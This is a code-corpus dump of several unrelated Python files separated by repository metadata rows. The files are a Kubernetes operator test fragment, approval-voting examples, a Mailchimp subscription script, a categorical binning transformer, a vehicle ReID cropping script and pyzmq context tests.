def assert_distributed_pods(self, master_node, replica_nodes, cluster_label):
'''
Other tests can lead to the situation that master and replica are on the same node.
Toggle pod anti affinity to distribute pods across nodes (the replica in particular).
'''
k8s = self.k8s
failover_targets = self.get_failover_targets(master_node, replica_nodes)
# enable pod anti affinity in the config map, which should trigger movement of the replica
patch_enable_antiaffinity = {
"data": {
"enable_pod_antiaffinity": "true"
}
}
k8s.update_config(patch_enable_antiaffinity, "enable antiaffinity")
self.assert_failover(master_node, len(replica_nodes), failover_targets, cluster_label)
# now disable pod anti affinity again, which will cause yet another failover
patch_disable_antiaffinity = {
"data": {
"enable_pod_antiaffinity": "false"
}
}
k8s.update_config(patch_disable_antiaffinity, "disable antiaffinity")
k8s.wait_for_pod_start('spilo-role=master')
k8s.wait_for_pod_start('spilo-role=replica')
return True
if __name__ == '__main__':
unittest.main()
| 45.114675
| 165
| 0.588894
|
a5689907a347198054df519f8e748913585a7547
| 2,051
|
py
|
Python
|
examples/abcsurvey/example05.py
|
lumbric/abcvoting
|
e58c9e15abf795536e03df7c16d8639185305679
|
[
"MIT"
] | null | null | null |
examples/abcsurvey/example05.py
|
lumbric/abcvoting
|
e58c9e15abf795536e03df7c16d8639185305679
|
[
"MIT"
] | null | null | null |
examples/abcsurvey/example05.py
|
lumbric/abcvoting
|
e58c9e15abf795536e03df7c16d8639185305679
|
[
"MIT"
] | null | null | null |
"""Example 5 (PAV, seq-PAV, revseq-PAV)
from the survey: "Approval-Based Multi-Winner Voting:
Axioms, Algorithms, and Applications"
by Martin Lackner and Piotr Skowron
"""
from abcvoting import abcrules
from abcvoting.preferences import Profile, Voter
from abcvoting import misc
from abcvoting.output import output
from abcvoting.output import DETAILS
output.set_verbosity(DETAILS)
print(misc.header("Example 5", "*"))
# Approval profile
num_cand = 4
a, b, c, d = range(4) # a = 0, b = 1, c = 2, ...
cand_names = "abcd"
approval_sets = [[a, b]] * 3 + [[a, d]] * 6 + [[b]] * 4 + [[c]] * 5 + [[c, d]] * 5
profile = Profile(num_cand, cand_names=cand_names)
profile.add_voters(approval_sets)
print(misc.header("Input:"))
print(profile.str_compact())
committees_pav = abcrules.compute_pav(profile, 2)
committees_seqpav = abcrules.compute_seqpav(profile, 2)
committees_revseqpav = abcrules.compute_revseqpav(profile, 2)
# verify correctness
assert committees_pav == [{a, c}]
assert committees_seqpav == [{c, d}]
assert committees_revseqpav == [{c, d}]
print("\n")
print(misc.header("Example from Janson's survey (Example 13.3) / Thiele:", "*"))
# Approval profile
num_cand = 4
a, b, c, d = range(4) # a = 0, b = 1, c = 2, ...
cand_names = "abcd"
profile = Profile(num_cand, cand_names=cand_names)
profile.add_voter(Voter([a, c, d], 960))
profile.add_voter(Voter([b, c, d], 3000))
profile.add_voter(Voter([b, c], 520))
profile.add_voter(Voter([a, b], 1620))
profile.add_voter(Voter([a, d], 1081))
profile.add_voter(Voter([a, c], 1240))
profile.add_voter(Voter([b, d], 360))
profile.add_voter(Voter([d], 360))
profile.add_voter(Voter([c], 120))
profile.add_voter(Voter([b], 60))
print(misc.header("Input:"))
print(profile.str_compact())
committees_pav = abcrules.compute_pav(profile, 2)
committees_seqpav = abcrules.compute_seqpav(profile, 2)
committees_revseqpav = abcrules.compute_revseqpav(profile, 2)
# verify correctness
assert committees_pav == [{a, b}]
assert committees_seqpav == [{a, c}]
assert committees_revseqpav == [{b, d}]
| 27.346667
| 82
| 0.710385
|
0aebdf755bc7039739e52f1546be6b5fd5e676c0
| 820
|
py
|
Python
|
k8s/images/codalab/apps/newsletter/scripts/send_emails_to_mailchimp.py
|
abdulari/codalab-competitions
|
fdfbb77ac62d56c6b4b9439935037f97ffcd1423
|
[
"Apache-2.0"
] | 333
|
2015-12-29T22:49:40.000Z
|
2022-03-27T12:01:57.000Z
|
k8s/images/codalab/apps/newsletter/scripts/send_emails_to_mailchimp.py
|
abdulari/codalab-competitions
|
fdfbb77ac62d56c6b4b9439935037f97ffcd1423
|
[
"Apache-2.0"
] | 1,572
|
2015-12-28T21:54:00.000Z
|
2022-03-31T13:00:32.000Z
|
k8s/images/codalab/apps/newsletter/scripts/send_emails_to_mailchimp.py
|
abdulari/codalab-competitions
|
fdfbb77ac62d56c6b4b9439935037f97ffcd1423
|
[
"Apache-2.0"
] | 107
|
2016-01-08T03:46:07.000Z
|
2022-03-16T08:43:57.000Z
|
import json
import requests
from django.contrib.auth import get_user_model
from codalab import settings
User = get_user_model()
def run():
if all([settings.MAILCHIMP_MEMBERS_ENDPOINT_ALL, settings.MAILCHIMP_API_KEY]):
for user in User.objects.all():
data = {
"email_address": user.email,
"status": "subscribed",
}
r = requests.patch(
settings.MAILCHIMP_MEMBERS_ENDPOINT_ALL,
auth=("", settings.MAILCHIMP_API_KEY),
data=json.dumps(data)
)
if not r.ok:
requests.post(
settings.MAILCHIMP_MEMBERS_ENDPOINT_ALL,
auth=("", settings.MAILCHIMP_API_KEY),
data=json.dumps(data)
)
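# Note added for clarity (an assumption about intent, not stated in the original script):
# the PATCH request above appears to update an already-subscribed Mailchimp member, and
# the POST fallback creates the subscription when no such member exists yet.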
| 27.333333
| 82
| 0.547561
|
1cc6173c1da5b81209ff55f2e29a83ebd3c58a38
| 6,921
|
py
|
Python
|
gators/binning/bin_rare_events.py
|
Aditya-Kapadiya/gators
|
d7c9967e3a8e304a601b6a92ad834d03d3e36338
|
[
"Apache-2.0"
] | 4
|
2021-10-29T18:20:52.000Z
|
2022-03-31T22:53:03.000Z
|
gators/binning/bin_rare_events.py
|
Aditya-Kapadiya/gators
|
d7c9967e3a8e304a601b6a92ad834d03d3e36338
|
[
"Apache-2.0"
] | 1
|
2022-01-19T12:16:19.000Z
|
2022-01-19T12:16:19.000Z
|
gators/binning/bin_rare_events.py
|
Aditya-Kapadiya/gators
|
d7c9967e3a8e304a601b6a92ad834d03d3e36338
|
[
"Apache-2.0"
] | 5
|
2021-11-17T20:16:54.000Z
|
2022-02-21T18:21:02.000Z
|
# License: Apache-2.0
import warnings
from typing import Dict, List, Union
import databricks.koalas as ks
import numpy as np
import pandas as pd
from binning import bin_rare_events
from ..transformers.transformer import Transformer
from ..util import util
class BinRareEvents(Transformer):
"""Replace low occurence categories by the value "OTHERS".
Use `BinRareEvents` to reduce the cardinality
of high cardinal columns. This transformer is also useful
to replace unseen categories by a value which is already
taken it account by the encoders.
Parameters
----------
min_ratio : float
Minimum occurrence ratio per category.
Examples
---------
>>> import pandas as pd
>>> from gators.binning import BinRareEvents
>>> obj = BinRareEvents(min_ratio=0.5)
>>> X = pd.DataFrame({'A': ['a', 'a', 'b'], 'B': ['a', 'b', 'c']})
>>> obj.fit_transform(X)
A B
0 a OTHERS
1 a OTHERS
2 OTHERS OTHERS
* fit & transform with `koalas`
>>> import databricks.koalas as ks
>>> from gators.binning import BinRareEvents
>>> obj = BinRareEvents(min_ratio=0.5)
>>> X = ks.DataFrame({'A': ['a', 'a', 'b'], 'B': ['a', 'b', 'c']})
>>> obj.fit_transform(X)
A B
0 a OTHERS
1 a OTHERS
2 OTHERS OTHERS
* fit with `pandas` & transform with `NumPy`
>>> import pandas as pd
>>> from gators.binning import BinRareEvents
>>> obj = BinRareEvents(min_ratio=0.5)
>>> X = pd.DataFrame({'A': ['a', 'a', 'b'], 'B': ['a', 'b', 'c']})
>>> _ = obj.fit(X)
>>> obj.transform_numpy(X.to_numpy())
array([['a', 'OTHERS'],
['a', 'OTHERS'],
['OTHERS', 'OTHERS']], dtype=object)
* fit with `koalas` & transform with `NumPy`
>>> import databricks.koalas as ks
>>> from gators.binning import BinRareEvents
>>> obj = BinRareEvents(min_ratio=0.5)
>>> X = ks.DataFrame({'A': ['a', 'a', 'b'], 'B': ['a', 'b', 'c']})
>>> _ = obj.fit(X)
>>> obj.transform_numpy(X.to_numpy())
array([['a', 'OTHERS'],
['a', 'OTHERS'],
['OTHERS', 'OTHERS']], dtype=object)
"""
def __init__(self, min_ratio: float):
if not isinstance(min_ratio, float):
raise TypeError("""`min_ratio` should be a float.""")
Transformer.__init__(self)
self.min_ratio = min_ratio
self.columns = []
self.idx_columns: np.ndarray = np.array([])
self.categories_to_keep_np: np.ndarray = None
self.n_categories_to_keep_np: np.ndarray = None
self.categories_to_keep_dict: Dict[str, np.ndarray] = {}
def fit(self, X: Union[pd.DataFrame, ks.DataFrame], y=None) -> "BinRareEvents":
"""Fit the transformer on the dataframe `X`.
Parameters
----------
X : Union[pd.DataFrame, ks.DataFrame].
Input dataframe.
y : None
None.
Returns
-------
BinRareEvents
Instance of itself.
"""
self.check_dataframe(X)
if object not in X.dtypes.to_numpy():
warnings.warn(
"""`X` does not contain object columns:
`BinRareEvents` is not needed"""
)
return self
self.columns = util.get_datatype_columns(X, datatype=object)
self.categories_to_keep_dict = self.compute_categories_to_keep_dict(
X=X[self.columns],
min_ratio=self.min_ratio,
)
self.categories_to_keep_np = self.get_categories_to_keep_np(
categories_to_keep_dict=self.categories_to_keep_dict,
)
self.n_categories_to_keep_np = self.categories_to_keep_np.shape[0] - (
self.categories_to_keep_np == None
).sum(0)
self.idx_columns = util.get_idx_columns(
columns=X.columns, selected_columns=self.columns
)
return self
def transform(
self, X: Union[pd.DataFrame, ks.DataFrame]
) -> Union[pd.DataFrame, ks.DataFrame]:
"""Transform the dataframe `X`.
Parameters
----------
X : Union[pd.DataFrame, ks.DataFrame].
Input dataframe.
Returns
-------
Union[pd.DataFrame, ks.DataFrame]
Transformed dataframe.
"""
self.check_dataframe(X)
def f(x):
name = x.name
if name not in self.categories_to_keep_dict:
return x
return x.mask(~x.isin(self.categories_to_keep_dict[name]), "OTHERS")
return X.apply(f)
def transform_numpy(self, X: np.ndarray) -> np.ndarray:
"""Transform the NumPy array.
Parameters
----------
X : np.ndarray
NumPy array.
Returns
-------
np.ndarray
Transformed NumPy array.
"""
self.check_array(X)
if self.idx_columns.size == 0:
return X
if self.categories_to_keep_np.shape[0] == 0:
X[:, self.idx_columns] = "OTHERS"
return X
return bin_rare_events(
X,
self.categories_to_keep_np,
self.n_categories_to_keep_np,
self.idx_columns,
)
@staticmethod
def compute_categories_to_keep_dict(
X: Union[pd.DataFrame, ks.DataFrame], min_ratio: float
) -> Dict[str, List[str]]:
"""Compute the category frequency.
Parameters
----------
X : Union[pd.DataFrame, ks.DataFrame].
Input dataframe.
min_ratio : float
Minimum occurrence ratio per category.
Returns
-------
Dict[str, List[str]]: Categories to keep.
"""
def f(x):
freq = x.astype("object").value_counts(normalize=True).sort_values()
freq = freq[freq >= min_ratio]
return list(freq.index)
mapping = X.apply(f).to_dict()
mapping = {
key: val if isinstance(val, list) else list(val.values())
for key, val in mapping.items()
}
return mapping
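# Worked example for the rule above (illustrative note added for clarity, not part of
# the original gators code): for a column ['a', 'a', 'b'] with min_ratio=0.5 the
# normalized frequencies are {'a': 2/3, 'b': 1/3}, so only 'a' is kept and 'b' is
# later replaced by "OTHERS" in transform/transform_numpy.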
@staticmethod
def get_categories_to_keep_np(
categories_to_keep_dict: Dict[str, np.ndarray]
) -> np.ndarray:
"""Get the categories to keep.
Parameters
----------
categories_to_keep_dict : Dict[str, np.ndarray])
Categories to keep.
Returns
-------
np.ndarray
Categories to keep.
"""
max_category = max([len(val) for val in categories_to_keep_dict.values()])
n_columns = len(categories_to_keep_dict)
categories_to_keep_np = np.empty((max_category, n_columns), dtype="object")
for i, val in enumerate(categories_to_keep_dict.values()):
categories_to_keep_np[: len(val), i] = val
return categories_to_keep_np
| 29.831897
| 83
| 0.56148
|
2707b2adf0a41bf4bbc55e6c645c6838acf25b23
| 5,447
|
py
|
Python
|
tools/aicity20/weakly_supervised_crop_aug.py
|
Johere/AICity2020-VOC-ReID
|
21268535595c8c90b87cd1ee89ddbcb341a86d76
|
[
"MIT"
] | 100
|
2020-04-25T03:58:01.000Z
|
2022-03-30T18:24:17.000Z
|
tools/aicity20/weakly_supervised_crop_aug.py
|
Johere/AICity2020-VOC-ReID
|
21268535595c8c90b87cd1ee89ddbcb341a86d76
|
[
"MIT"
] | 30
|
2020-04-27T07:15:00.000Z
|
2022-01-03T19:49:49.000Z
|
tools/aicity20/weakly_supervised_crop_aug.py
|
Johere/AICity2020-VOC-ReID
|
21268535595c8c90b87cd1ee89ddbcb341a86d76
|
[
"MIT"
] | 25
|
2020-04-25T22:53:30.000Z
|
2022-03-28T00:46:51.000Z
|
'''
Detect objects from the network activation map (actmap) and save the cropped regions.
'''
# encoding: utf-8
import argparse
import os
import sys
from os import mkdir
import cv2
import numpy as np
import torch
from torch.backends import cudnn
from torch.nn import functional as F
import json
sys.path.append('.')
from lib.config import cfg
from lib.data import make_data_loader
from lib.engine.inference import inference
from lib.modeling import build_model
from lib.utils.logger import setup_logger
from lib.utils.bbox_utils import localize_from_map, draw_bbox
def vis_actmap(model, cfg, loader, out_dir):
device = cfg.MODEL.DEVICE
model.to(device)
model.eval()
img_size = cfg.INPUT.SIZE_TEST
if not os.path.exists(out_dir):
os.mkdir(out_dir)
if not os.path.exists(os.path.join(out_dir, 'image_train')):
os.mkdir(os.path.join(out_dir, 'image_train'))
if not os.path.exists(os.path.join(out_dir, 'image_query')):
os.mkdir(os.path.join(out_dir, 'image_query'))
if not os.path.exists(os.path.join(out_dir, 'image_test')):
os.mkdir(os.path.join(out_dir, 'image_test'))
results = []
with torch.no_grad():
for i, batch in enumerate(loader):
data, pid, camid, img_path = batch
data = data.cuda()
featmap = model(data, return_featmap=True) # N*2048*7*7
featmap = (featmap**2).sum(1) # N*1*7*7
canvas = []
for j in range(featmap.size(0)):
fm = featmap[j].detach().cpu().numpy()
# something is not right!
# fm[0:3, 0:3] = 0
# fm[0:3, 12:15] = 0
# fm[12:15, 0:3] = 0
# fm[12:15, 12:15] = 0
fm[0:4, :] = 0
fm[12:16, :] = 0
fm[:, 0:4] = 0
fm[:, 12:16] = 0
fm = cv2.resize(fm, (img_size[1], img_size[0]))
fm = 255 * (fm - np.min(fm)) / (
np.max(fm) - np.min(fm) + 1e-12
)
bbox = localize_from_map(fm, threshold_ratio=1.0)
fm = np.uint8(np.floor(fm))
fm = cv2.applyColorMap(fm, cv2.COLORMAP_JET)
img = cv2.imread(img_path[j])
height, width, _ = img.shape
#img = cv2.resize(img, (img_size[1], img_size[0]))
bbox = np.array(bbox, dtype=np.float32)
bbox[0::2] *= width / img_size[1]
bbox[1::2] *= height / img_size[0]
bbox[:2] *= 0.7
bbox[2:] *= 1.2
bbox = np.array(bbox, dtype=np.int)
results.append({'img_path': '/'.join(img_path[j].split('/')[-2:]), 'bbox': bbox.tolist()})
crop = img[bbox[1]:bbox[3], bbox[0]:bbox[2], :]
#crop = cv2.resize(crop, (img_size[1], img_size[0]))
cv2.imwrite(os.path.join(out_dir, '/'.join(img_path[j].split('/')[-2:])), crop)
#overlapped = img * 0.3 + fm * 0.7
#overlapped = draw_bbox(overlapped, [bbox])
#overlapped = overlapped.astype(np.uint8)
#canvas.append(cv2.resize(overlapped, (img_size[1], img_size[0])))
#canvas = np.concatenate(canvas[:8], axis=1) # .reshape([-1, 2048, 3])
#cv2.imwrite(os.path.join(out_dir, '{}.jpg'.format(i)), canvas)
return results
def main():
parser = argparse.ArgumentParser(description="ReID Baseline Inference")
parser.add_argument(
"--config_file", default="./configs/debug.yml", help="path to config file", type=str
)
parser.add_argument("opts", help="Modify config options using the command-line", default=None,
nargs=argparse.REMAINDER)
args = parser.parse_args()
num_gpus = int(os.environ["WORLD_SIZE"]) if "WORLD_SIZE" in os.environ else 1
if args.config_file != "":
cfg.merge_from_file(args.config_file)
cfg.merge_from_list(args.opts)
cfg.freeze()
output_dir = cfg.OUTPUT_DIR
if output_dir and not os.path.exists(output_dir):
mkdir(output_dir)
logger = setup_logger("reid_baseline", output_dir, 0)
logger.info("Using {} GPUS".format(num_gpus))
logger.info(args)
if args.config_file != "":
logger.info("Loaded configuration file {}".format(args.config_file))
logger.info("Running with config:\n{}".format(cfg))
if cfg.MODEL.DEVICE == "cuda":
os.environ['CUDA_VISIBLE_DEVICES'] = cfg.MODEL.DEVICE_ID
cudnn.benchmark = True
train_loader, val_loader, num_query, num_classes, dataset = make_data_loader(cfg)
model = build_model(cfg, num_classes)
model.load_param(cfg.TEST.WEIGHT)
results = []
out_dir = os.path.dirname(cfg.TEST.WEIGHT)
results += vis_actmap(model, cfg, train_loader, out_dir)
results += vis_actmap(model, cfg, val_loader, out_dir)
with open(os.path.join(out_dir, 'detection.json'), 'w') as f:
json.dump(results, f)
if __name__ == '__main__':
main()
'''
python tools/aicity20/weakly_supervised_crop_aug.py --config_file='configs/aicity20.yml' \
MODEL.DEVICE_ID "('0')" \
MODEL.NAME "('resnet50_ibn_a')" \
MODEL.MODEL_TYPE "baseline" \
DATASETS.TRAIN "('aicity20',)" \
DATASETS.TEST "('aicity20',)" \
DATALOADER.SAMPLER 'softmax' \
DATASETS.ROOT_DIR "('/home/zxy/data/ReID/vehicle')" \
MODEL.PRETRAIN_CHOICE "('self')" \
TEST.WEIGHT "('./output/aicity20/0326-search/augmix/best.pth')"
'''
| 33.213415
| 106
| 0.590233
|
c32938e59deb0fe5384b4584d38798d48ec25f49
| 366
|
py
|
Python
|
dodo.py
|
thepinetree/noisepage-pilot
|
97ab95d2458fe3974aac13935094be17fca69522
|
[
"MIT"
] | null | null | null |
dodo.py
|
thepinetree/noisepage-pilot
|
97ab95d2458fe3974aac13935094be17fca69522
|
[
"MIT"
] | null | null | null |
dodo.py
|
thepinetree/noisepage-pilot
|
97ab95d2458fe3974aac13935094be17fca69522
|
[
"MIT"
] | null | null | null |
# doit automatically picks up tasks as long as their unqualified name is prefixed with task_.
# Read the guide: https://pydoit.org/tasks.html
from dodos.action import *
from dodos.behavior import *
from dodos.benchbase import *
from dodos.ci import *
from dodos.forecast import *
from dodos.noisepage import *
from dodos.pilot import *
from dodos.project1 import *
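# A minimal sketch of the convention described above (illustrative only, not part of
# this repository): doit collects any module-level function whose name starts with
# task_ and expects it to return a task dict. The task name "example_hello" and its
# echo action are made up for this example.
def task_example_hello():
    """Hypothetical task used only to illustrate doit's task discovery."""
    return {
        "actions": ["echo hello"],
        "verbosity": 2,
    }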
| 30.5
| 93
| 0.781421
|
ab6f71c14767fe898f2ae8f31ecf19df2495df62
| 4,072
|
py
|
Python
|
dashboard/lib/flanker/mime/message/headers/encodedword.py
|
robertsimmons514/isthislegit
|
aa8f2b6cb2ac3de2b0fe03bb93dbceccc4c1f495
|
[
"BSD-3-Clause"
] | 282
|
2017-07-01T03:47:54.000Z
|
2022-02-25T00:58:40.000Z
|
dashboard/lib/flanker/mime/message/headers/encodedword.py
|
robertsimmons514/isthislegit
|
aa8f2b6cb2ac3de2b0fe03bb93dbceccc4c1f495
|
[
"BSD-3-Clause"
] | 46
|
2017-07-26T22:54:13.000Z
|
2022-02-14T21:39:52.000Z
|
dashboard/lib/flanker/mime/message/headers/encodedword.py
|
robertsimmons514/isthislegit
|
aa8f2b6cb2ac3de2b0fe03bb93dbceccc4c1f495
|
[
"BSD-3-Clause"
] | 53
|
2017-07-22T15:04:16.000Z
|
2022-03-16T03:36:28.000Z
|
# coding:utf-8
import logging
import re
import email.quoprimime
import email.base64mime
from base64 import b64encode
from flanker.mime.message import charsets, errors
log = logging.getLogger(__name__)
#deal with unfolding
foldingWhiteSpace = re.compile(r"(\n\r?|\r\n?)(\s*)")
def unfold(value):
"""
Unfolding is accomplished by simply removing any CRLF
that is immediately followed by WSP. Each header field should be
treated in its unfolded form for further syntactic and semantic
evaluation.
"""
return re.sub(foldingWhiteSpace, r"\2", value)
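# Illustrative example added for clarity (not part of the original flanker module):
# unfold("Re: a very\r\n long subject") -> "Re: a very long subject"
# i.e. the CRLF is dropped and the folded continuation keeps its leading whitespace.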
def decode(header):
return mime_to_unicode(header)
def mime_to_unicode(header):
"""
Takes a header value and returns a fully decoded unicode string.
It differs from the standard Python email.header.decode_header() because:
- it is higher level, i.e. returns a unicode string instead of
an array of tuples
- it accepts Unicode and non-ASCII strings as well
>>> mime_to_unicode("=?UTF-8?B?UmVbMl06INCX0LXQvNC70Y/QutC4?=")
u"Re[2]: Земляки"
>>> mime_to_unicode("hello")
u"hello"
"""
# Only string header values need to be converted.
if not isinstance(header, basestring):
return header
try:
header = unfold(header)
decoded = [] # decoded parts
while header:
match = encodedWord.search(header)
if match:
start = match.start()
if start != 0:
# decodes unencoded ascii part to unicode
value = charsets.convert_to_unicode(ascii, header[0:start])
if value.strip():
decoded.append(value)
# decode a header =?...?= of encoding
charset, value = decode_part(
match.group('charset').lower(),
match.group('encoding').lower(),
match.group('encoded'))
decoded.append(charsets.convert_to_unicode(charset, value))
header = header[match.end():]
else:
# no match? append the remainder
# of the string to the list of chunks
decoded.append(charsets.convert_to_unicode(ascii, header))
break
return u"".join(decoded)
except Exception:
try:
logged_header = header
if isinstance(logged_header, unicode):
logged_header = logged_header.encode('utf-8')
# encode header as utf-8 so all characters can be base64 encoded
logged_header = b64encode(logged_header)
log.warning(
u"HEADER-DECODE-FAIL: ({0}) - b64encoded".format(
logged_header))
except Exception:
log.exception("Failed to log exception")
return header
ascii = 'ascii'
#this spec refers to
#http://tools.ietf.org/html/rfc2047
encodedWord = re.compile(r'''(?P<encodedWord>
=\? # literal =?
(?P<charset>[^?]*?) # non-greedy up to the next ? is the charset
\? # literal ?
(?P<encoding>[qb]) # either a "q" or a "b", case insensitive
\? # literal ?
(?P<encoded>.*?) # non-greedy up to the next ?= is the encoded string
\?= # literal ?=
)''', re.VERBOSE | re.IGNORECASE | re.MULTILINE)
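# Example match added for clarity (not part of the original module): for the header
# fragment "=?utf-8?b?aGVsbG8=?=" the named groups are charset="utf-8", encoding="b"
# and encoded="aGVsbG8=", which decode_part() below turns into ('utf-8', 'hello').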
def decode_part(charset, encoding, value):
"""
Attempts to decode part, understands
'q' - quoted encoding
'b' - base64 mime encoding
Returns (charset, decoded-string)
"""
if encoding == 'q':
return (charset, email.quoprimime.header_decode(str(value)))
elif encoding == 'b':
# Postel's law: add missing padding
paderr = len(value) % 4
if paderr:
value += '==='[:4 - paderr]
return (charset, email.base64mime.decode(value))
elif not encoding:
return (charset, value)
else:
raise errors.DecodingError(
"Unknown encoding: {0}".format(encoding))
| 31.565891
| 80
| 0.582515
|
39658c25a232a30323084d4bd61021d193079d44
| 10,172
|
py
|
Python
|
ServidorPython/python32_web/Lib/site-packages/zmq/tests/test_context.py
|
mak213k/Servidor_automatizado_python
|
4403ef8027a2f814220baacc95856cf5fbf01d21
|
[
"MIT"
] | 130
|
2018-02-03T10:25:54.000Z
|
2022-03-25T22:27:22.000Z
|
ServidorPython/python32_web/Lib/site-packages/zmq/tests/test_context.py
|
mak213k/Servidor_automatizado_python
|
4403ef8027a2f814220baacc95856cf5fbf01d21
|
[
"MIT"
] | 12
|
2018-12-06T22:06:49.000Z
|
2022-02-25T17:40:44.000Z
|
ServidorPython/python32_web/Lib/site-packages/zmq/tests/test_context.py
|
mak213k/Servidor_automatizado_python
|
4403ef8027a2f814220baacc95856cf5fbf01d21
|
[
"MIT"
] | 64
|
2018-04-25T08:51:57.000Z
|
2022-01-29T14:13:57.000Z
|
# Copyright (C) PyZMQ Developers
# Distributed under the terms of the Modified BSD License.
import copy
import gc
import sys
import time
from threading import Thread, Event
try:
from queue import Queue
except ImportError:
from Queue import Queue
from pytest import mark
import zmq
from zmq.tests import (
BaseZMQTestCase, have_gevent, GreenTest, skip_green, PYPY, SkipTest,
)
class KwargTestSocket(zmq.Socket):
test_kwarg_value = None
def __init__(self, *args, **kwargs):
self.test_kwarg_value = kwargs.pop('test_kwarg', None)
super(KwargTestSocket, self).__init__(*args, **kwargs)
class KwargTestContext(zmq.Context):
_socket_class = KwargTestSocket
class TestContext(BaseZMQTestCase):
def test_init(self):
c1 = self.Context()
self.assert_(isinstance(c1, self.Context))
del c1
c2 = self.Context()
self.assert_(isinstance(c2, self.Context))
del c2
c3 = self.Context()
self.assert_(isinstance(c3, self.Context))
del c3
def test_dir(self):
ctx = self.Context()
self.assertTrue('socket' in dir(ctx))
if zmq.zmq_version_info() > (3,):
self.assertTrue('IO_THREADS' in dir(ctx))
ctx.term()
def test_term(self):
c = self.Context()
c.term()
self.assert_(c.closed)
def test_context_manager(self):
with self.Context() as c:
pass
self.assert_(c.closed)
def test_fail_init(self):
self.assertRaisesErrno(zmq.EINVAL, self.Context, -1)
def test_term_hang(self):
rep,req = self.create_bound_pair(zmq.ROUTER, zmq.DEALER)
req.setsockopt(zmq.LINGER, 0)
req.send(b'hello', copy=False)
req.close()
rep.close()
self.context.term()
def test_instance(self):
ctx = self.Context.instance()
c2 = self.Context.instance(io_threads=2)
self.assertTrue(c2 is ctx)
c2.term()
c3 = self.Context.instance()
c4 = self.Context.instance()
self.assertFalse(c3 is c2)
self.assertFalse(c3.closed)
self.assertTrue(c3 is c4)
def test_instance_threadsafe(self):
self.context.term() # clear default context
q = Queue()
# slow context initialization,
# to ensure that we are both trying to create one at the same time
class SlowContext(self.Context):
def __init__(self, *a, **kw):
time.sleep(1)
super(SlowContext, self).__init__(*a, **kw)
def f():
q.put(SlowContext.instance())
# call ctx.instance() in several threads at once
N = 16
threads = [ Thread(target=f) for i in range(N) ]
[ t.start() for t in threads ]
# also call it in the main thread (not first)
ctx = SlowContext.instance()
assert isinstance(ctx, SlowContext)
# check that all the threads got the same context
for i in range(N):
thread_ctx = q.get(timeout=5)
assert thread_ctx is ctx
# cleanup
ctx.term()
[ t.join(timeout=5) for t in threads ]
def test_socket_passes_kwargs(self):
test_kwarg_value = 'testing one two three'
with KwargTestContext() as ctx:
with ctx.socket(zmq.DEALER, test_kwarg=test_kwarg_value) as socket:
self.assertTrue(socket.test_kwarg_value is test_kwarg_value)
def test_many_sockets(self):
"""opening and closing many sockets shouldn't cause problems"""
ctx = self.Context()
for i in range(16):
sockets = [ ctx.socket(zmq.REP) for i in range(65) ]
[ s.close() for s in sockets ]
# give the reaper a chance
time.sleep(1e-2)
ctx.term()
def test_sockopts(self):
"""setting socket options with ctx attributes"""
ctx = self.Context()
ctx.linger = 5
self.assertEqual(ctx.linger, 5)
s = ctx.socket(zmq.REQ)
self.assertEqual(s.linger, 5)
self.assertEqual(s.getsockopt(zmq.LINGER), 5)
s.close()
# check that subscribe doesn't get set on sockets that don't subscribe:
ctx.subscribe = b''
s = ctx.socket(zmq.REQ)
s.close()
ctx.term()
@mark.skipif(
sys.platform.startswith('win'),
reason='Segfaults on Windows')
def test_destroy(self):
"""Context.destroy should close sockets"""
ctx = self.Context()
sockets = [ ctx.socket(zmq.REP) for i in range(65) ]
# close half of the sockets
[ s.close() for s in sockets[::2] ]
ctx.destroy()
# reaper is not instantaneous
time.sleep(1e-2)
for s in sockets:
self.assertTrue(s.closed)
def test_destroy_linger(self):
"""Context.destroy should set linger on closing sockets"""
req,rep = self.create_bound_pair(zmq.REQ, zmq.REP)
req.send(b'hi')
time.sleep(1e-2)
self.context.destroy(linger=0)
# reaper is not instantaneous
time.sleep(1e-2)
for s in (req,rep):
self.assertTrue(s.closed)
def test_term_noclose(self):
"""Context.term won't close sockets"""
ctx = self.Context()
s = ctx.socket(zmq.REQ)
self.assertFalse(s.closed)
t = Thread(target=ctx.term)
t.start()
t.join(timeout=0.1)
self.assertTrue(t.is_alive(), "Context should be waiting")
s.close()
t.join(timeout=0.1)
self.assertFalse(t.is_alive(), "Context should have closed")
def test_gc(self):
"""test close&term by garbage collection alone"""
if PYPY:
raise SkipTest("GC doesn't work ")
# test credit @dln (GH #137):
def gcf():
def inner():
ctx = self.Context()
s = ctx.socket(zmq.PUSH)
inner()
gc.collect()
t = Thread(target=gcf)
t.start()
t.join(timeout=1)
self.assertFalse(t.is_alive(), "Garbage collection should have cleaned up context")
def test_cyclic_destroy(self):
"""ctx.destroy should succeed when cyclic ref prevents gc"""
# test credit @dln (GH #137):
class CyclicReference(object):
def __init__(self, parent=None):
self.parent = parent
def crash(self, sock):
self.sock = sock
self.child = CyclicReference(self)
def crash_zmq():
ctx = self.Context()
sock = ctx.socket(zmq.PULL)
c = CyclicReference()
c.crash(sock)
ctx.destroy()
crash_zmq()
def test_term_thread(self):
"""ctx.term should not crash active threads (#139)"""
ctx = self.Context()
evt = Event()
evt.clear()
def block():
s = ctx.socket(zmq.REP)
s.bind_to_random_port('tcp://127.0.0.1')
evt.set()
try:
s.recv()
except zmq.ZMQError as e:
self.assertEqual(e.errno, zmq.ETERM)
return
finally:
s.close()
self.fail("recv should have been interrupted with ETERM")
t = Thread(target=block)
t.start()
evt.wait(1)
self.assertTrue(evt.is_set(), "sync event never fired")
time.sleep(0.01)
ctx.term()
t.join(timeout=1)
self.assertFalse(t.is_alive(), "term should have interrupted s.recv()")
def test_destroy_no_sockets(self):
ctx = self.Context()
s = ctx.socket(zmq.PUB)
s.bind_to_random_port('tcp://127.0.0.1')
s.close()
ctx.destroy()
assert s.closed
assert ctx.closed
def test_ctx_opts(self):
if zmq.zmq_version_info() < (3,):
raise SkipTest("context options require libzmq 3")
ctx = self.Context()
ctx.set(zmq.MAX_SOCKETS, 2)
self.assertEqual(ctx.get(zmq.MAX_SOCKETS), 2)
ctx.max_sockets = 100
self.assertEqual(ctx.max_sockets, 100)
self.assertEqual(ctx.get(zmq.MAX_SOCKETS), 100)
def test_copy(self):
c1 = self.Context()
c2 = copy.copy(c1)
c2b = copy.deepcopy(c1)
c3 = copy.deepcopy(c2)
self.assert_(c2._shadow)
self.assert_(c3._shadow)
self.assertEqual(c1.underlying, c2.underlying)
self.assertEqual(c1.underlying, c3.underlying)
self.assertEqual(c1.underlying, c2b.underlying)
s = c3.socket(zmq.PUB)
s.close()
c1.term()
def test_shadow(self):
ctx = self.Context()
ctx2 = self.Context.shadow(ctx.underlying)
self.assertEqual(ctx.underlying, ctx2.underlying)
